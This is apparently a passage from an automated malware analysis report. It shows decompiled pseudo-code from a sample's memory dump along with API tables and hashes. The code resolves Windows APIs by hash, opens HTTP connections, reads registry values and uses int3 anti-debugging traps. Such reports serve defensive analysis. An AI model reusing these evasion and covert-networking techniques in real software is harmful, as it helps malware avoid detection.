							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = E008A15C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x8cb248; // 0xcc0004
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E008A7F00();
							E008A8CA0( &(_t254[0x20]));
							E008A8CA0( &(_t254[0x1c]));
							E008B0B10( &(_t254[0xe]));
							E008B0B10( &(_t254[0xa]));
							E008B0B10( &(_t254[6]));
							E008B0B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = E008A15C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = E008A15C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E008A7B30(_t155 - 1,  &(_t254[0x18]), 0x8caa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E008A8CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E008A7F00();
										E008A8CA0( &(_t254[0x20]));
										E008A8CA0( &(_t254[0x1c]));
										E008B0B10( &(_t254[0xe]));
										E008B0B10( &(_t254[0xa]));
										E008B0B10( &(_t254[6]));
										E008B0B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x8cb244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E008C2760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x8cb27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E008C2810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E008A10E0(0);
											_t230 =  *0x8cb27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = E008A15C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = E008A15C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = E008A15C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = E008A15C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E008A8CA0( &(_t254[0x20]));
										E008A8CA0( &(_t254[0x1c]));
										E008B0B10( &(_t254[0xe]));
										E008B0B10( &(_t254[0xa]));
										E008B0B10( &(_t254[6]));
										E008B0B10( &(_t254[2]));
										return 1;
									}
								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = E008A15C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = E008A15C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x008c3374
0x008c3377
0x008c337d
0x008c337f
0x008c3389
0x008c3394
0x008c339f
0x008c33aa
0x008c33b4
0x008c33b9
0x008c33c2
0x008c33cf
0x008c33dc
0x008c33eb
0x008c33fa
0x008c3407
0x008c3410
0x008c3419
0x008c3429
0x008c342b
0x008c343f
0x008c3449
0x008c3454
0x008c3459
0x008c345b
0x008c345b
0x008c344b
0x008c344b
0x008c344b
0x008c3449
0x008c3475
0x008c37cf
0x008c37d3
0x008c3804
0x008c3804
0x008c3808
0x00000000
0x008c37d5
0x008c37d5
0x008c37d8
0x008c37da
0x008c37e5
0x008c37e5
0x008c37dc
0x008c37dc
0x008c37df
0x00000000
0x008c37e1
0x008c37e1
0x008c37e1
0x008c37df
0x008c37ea
0x008c37ec
0x00000000
0x008c37ee
0x008c37f8
0x008c37fd
0x008c37ff
0x00000000
0x008c3801
0x008c3801
0x008c3802
0x008c3803
0x008c3803
0x008c37ff
0x008c37ec
0x008c347b
0x008c3486
0x008c348c
0x008c348e
0x008c3494
0x008c34c5
0x008c34c5
0x008c34c9
0x008c34cc
0x008c34ce
0x008c34d9
0x008c34d9
0x008c34d0
0x008c34d0
0x008c34d3
0x00000000
0x008c34d5
0x008c34d5
0x008c34d5
0x008c34d3
0x008c34de
0x008c34e0
0x008c36e0
0x008c36e7
0x008c36f0
0x008c36f9
0x008c3702
0x008c370b
0x008c3714
0x008c3719
0x008c3722
0x008c34e6
0x008c34e6
0x008c34ea
0x008c34f6
0x008c34ec
0x008c34ec
0x008c34ec
0x008c3508
0x008c350f
0x008c3511
0x008c3788
0x008c378c
0x008c37bd
0x008c37bd
0x008c37c1
0x008c37c3
0x00000000
0x008c378e
0x008c378e
0x008c3791
0x008c3793
0x008c379e
0x008c379e
0x008c3795
0x008c3795
0x008c3798
0x00000000
0x008c379a
0x008c379a
0x008c379a
0x008c3798
0x008c37a3
0x008c37a5
0x00000000
0x008c37a7
0x008c37b1
0x008c37b6
0x008c37b8
0x00000000
0x008c37ba
0x008c37ba
0x008c37bb
0x008c37bc
0x008c37bc
0x008c37b8
0x008c37a5
0x008c3517
0x008c3517
0x008c351a
0x008c3524
0x008c352e
0x008c3544
0x008c3546
0x008c3548
0x008c354c
0x008c357d
0x008c357d
0x008c3584
0x008c3588
0x008c358d
0x008c3590
0x008c3592
0x008c359d
0x008c359d
0x008c3594
0x008c3594
0x008c3597
0x00000000
0x008c3599
0x008c3599
0x008c3599
0x008c3597
0x008c35a2
0x008c35a4
0x008c3743
0x008c374a
0x008c3753
0x008c375c
0x008c3765
0x008c376e
0x008c3777
0x008c377c
0x008c3785
0x008c35aa
0x008c35aa
0x008c35af
0x008c35b4
0x008c35be
0x008c35c3
0x008c35c8
0x008c35c8
0x008c35cc
0x00000000
0x00000000
0x008c35d2
0x008c35d3
0x008c35d9
0x00000000
0x00000000
0x008c35db
0x008c35df
0x00000000
0x008c35df
0x008c3727
0x008c372a
0x008c372f
0x008c3735
0x00000000
0x008c3735
0x008c35e4
0x008c35e4
0x008c35e7
0x008c35e9
0x008c35f1
0x008c3604
0x008c3606
0x008c3608
0x008c3616
0x008c3616
0x008c3627
0x008c3629
0x008c362b
0x008c3639
0x008c3639
0x008c362b
0x008c363b
0x008c3652
0x008c3654
0x008c3656
0x008c3667
0x008c3667
0x008c3669
0x008c3680
0x008c3682
0x008c3684
0x008c3694
0x008c3694
0x008c369a
0x008c36a3
0x008c36ac
0x008c36b5
0x008c36be
0x008c36c7
0x008c36d8
0x008c36d8
0x008c354e
0x008c354e
0x008c3551
0x008c3553
0x008c355e
0x008c355e
0x008c3555
0x008c3555
0x008c3558
0x00000000
0x008c355a
0x008c355a
0x008c355a
0x008c3558
0x008c3563
0x008c3565
0x00000000
0x008c3567
0x008c3571
0x008c3576
0x008c3578
0x00000000
0x008c357a
0x008c357a
0x008c357b
0x008c357c
0x008c357c
0x008c3578
0x008c3565
0x008c354c
0x008c3511
0x008c3496
0x008c3496
0x008c349b
0x008c34a6
0x008c34a2
0x008c34a2
0x008c34a2
0x008c34ad
0x00000000
0x008c34af
0x008c34b9
0x008c34c0
0x00000000
0x008c34c2
0x008c34c2
0x008c34c3
0x008c34c4
0x008c34c4
0x008c34c0
0x008c34ad
0x008c3494

APIs

InternetConnectW.WININET(00CC0004,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 008C348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,008CAA40,A1310F65,D27F045A,8813E141), ref: 008C3544

Part of subcall function 008A10E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A1124

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: 1f06bc0b1db26658936250829ec154c7e4ce779d96b82cde2dbea78d494174b9
Instruction ID: 5f6386dcf4eca9ce011142aea575c6d0afa45fc08220ee21ddcde16ee6d72d53
Opcode Fuzzy Hash: 1f06bc0b1db26658936250829ec154c7e4ce779d96b82cde2dbea78d494174b9
Instruction Fuzzy Hash: 02C19E70214205ABEB15EF28CC85FAFB7B4FF91354F10882CB555C62A1EB70DA46CB62

Uniqueness

Uniqueness Score: -1.00%

Function 008BCAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E008BCAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E008B9350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E008A87A0(_t129);
						if(E008A15C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E008B9670(_t146 + 0x14, _t89);
							if(E008A15C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E008B9640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E008A8CA0(_t146 + 8);
						} else {
							E008A8CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = E008A15C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E008B9640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E008A8810(_t146, _t101);
					_t144 = E008A15C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E008B9640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E008A88C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E008A8CA0(_t146);
					E008B9510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E008A8810( *((intOrPtr*)(_t146 + 0x44)), 0);
							E008B9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E008A8AB0( *((intOrPtr*)(_t146 + 0x48)), E008B9640(_t146 + 0x14, 0), 0);
							E008B9510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E008A8810(_t146 + 4, 0);
						_t102 = E008B9640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E008B0180( *_t146, 0x7fffffff, _t142) != 0) {
								E008A96D0(_t146 + 4, 0xa);
							}
							E008A8AB0(_t146 + 0x30, _t102, 0);
							E008B0220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E008B0180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E008A8CA0(_t146 + 0x28);
						}
						E008A88C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E008A8CA0(_t146);
						E008B9510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x008bcae6
0x008bcae8
0x008bcaee
0x008bcaf3
0x008bcaf8
0x008bcb03
0x008bcaff
0x008bcaff
0x008bcaff
0x008bcb0a
0x008bcb6b
0x008bcb6b
0x008bcb0c
0x008bcb0c
0x008bcb12
0x008bcb1b
0x008bcb1f
0x008bcb22
0x008bcb25
0x008bcb3d
0x008bcb54
0x008bcb54
0x008bcb56
0x008bcb5c
0x008bcd05
0x008bcd1d
0x008bcd1f
0x008bcd42
0x008bcd42
0x008bcd44
0x008bcd4c
0x008bcb62
0x008bcb66
0x00000000
0x008bcb66
0x00000000
0x00000000
0x00000000
0x008bcb12
0x008bcb70
0x008bcc84
0x008bcc88
0x008bcc94
0x008bcca0
0x008bcca2
0x008bcc8a
0x008bcc8a
0x008bcc8a
0x008bcca8
0x008bccbc
0x008bccc0
0x008bccc8
0x008bccd3
0x008bccd3
0x008bccdd
0x008bcce5
0x008bccee
0x008bccfd
0x008bcb76
0x008bcb79
0x008bcc25
0x008bcc5a
0x008bcc63
0x008bcc72
0x008bcc27
0x008bcc39
0x008bcc42
0x008bcc51
0x008bcc51
0x008bcb7f
0x008bcb85
0x008bcb95
0x008bcb9c
0x008bcbad
0x008bcbb5
0x008bcbb5
0x008bcbc1
0x008bcbd0
0x008bcbe7
0x008bcbeb
0x008bcbf3
0x008bcbff
0x008bcc07
0x008bcc10
0x008bcc1f
0x008bcc1f
0x008bcb79

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 008BCB54

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction ID: a409e1acf27631e4acdda2f37665a9c330c22f6828ab1c7a08eafbd3b669b960
Opcode Fuzzy Hash: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction Fuzzy Hash: 4C612E30614201AAE714EF68CC92AAFB3E8FFA5754F00492DF685D6291EE21ED04C767

Uniqueness

Uniqueness Score: -1.00%

Function 008BC790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E008BC790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E008B9350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					E008B9510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
						if(E008A15C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E008B9670(_t53 + 4, _t26);
							if(E008A15C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E008B9640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E008B97D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x008bc798
0x008bc79c
0x008bc79e
0x008bc7a3
0x008bc7a8
0x008bc7ad
0x008bc7b8
0x008bc7b4
0x008bc7b4
0x008bc7b4
0x008bc7bf
0x008bc805
0x008bc80c
0x008bc819
0x008bc7c1
0x008bc7c1
0x008bc7c7
0x008bc7ce
0x008bc7d2
0x008bc7e9
0x008bc7fb
0x008bc7fb
0x008bc7fd
0x008bc803
0x008bc821
0x008bc839
0x008bc85a
0x008bc85a
0x008bc861
0x008bc86e
0x008bc86e
0x008bc861
0x008bc803
0x00000000
0x008bc7c7

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 008BC7FB
RegQueryValueExA.KERNEL32(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 008BC85A

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction ID: bd36c436917d2c394299553b72704fe342e5016561bcaf898fdbc421d30648cd
Opcode Fuzzy Hash: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction Fuzzy Hash: 0E215E31604216AAD621DE28CC45EEB7BD8FF95B10F04092DF545D6351EB30DD09CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 008A47B0, Relevance: 2.1, APIs: 1, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E008A47B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x8cb1f4; // 0xec1568
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x8cb1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = E008A7564(0x3ab94787);
						if(_t196 == 0) {
							if(E008A6C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = E008A7564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E008A67C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E008A7BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = E008A7564(0xa1310f65);
											if(_t214 == 0) {
												if(E008A6C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = E008A7564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E008A67C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x8cb1f4; // 0xec1568
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x8cb1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = E008A7564(0x3ab94787);
												if(_t198 == 0) {
													if(E008A6C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = E008A7564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E008A67C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E008B9350(_t285 + 4);
																_t250 =  *0x8cb1f4; // 0xec1568
																if(_t250 == 0xc139578) {
																	 *0x8cb1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = E008A7564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E008A6C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = E008A7564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E008A67C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E008B9640(_t285 + 4, 0);
																					_t110 = E008B9650(_t285);
																					_push(_t285 + 0x30);
																					_push(_t110);
																					_push(_t109);
																					_push(2);
																					_push( *(_t285 + 0x44));
																					if( *_t277() == 0) {
																						_t253 =  *0x8cb1f4; // 0xec1568
																						if(_t253 == 0xc139578) {
																							 *0x8cb1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = E008A7564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E008A6C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = E008A7564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E008A67C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t253 =  *(_t253 + 0x180);
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E008B9640(_t285 + 4, 0);
																						_t118 =  *0x8ca148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x8ca14c & 0x0000ffff;
																						_t255 =  *0x8cb1f4; // 0xec1568
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x8cb1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = E008A7564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E008A6C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = E008A7564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E008A67C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											E008B9510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E008BBE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
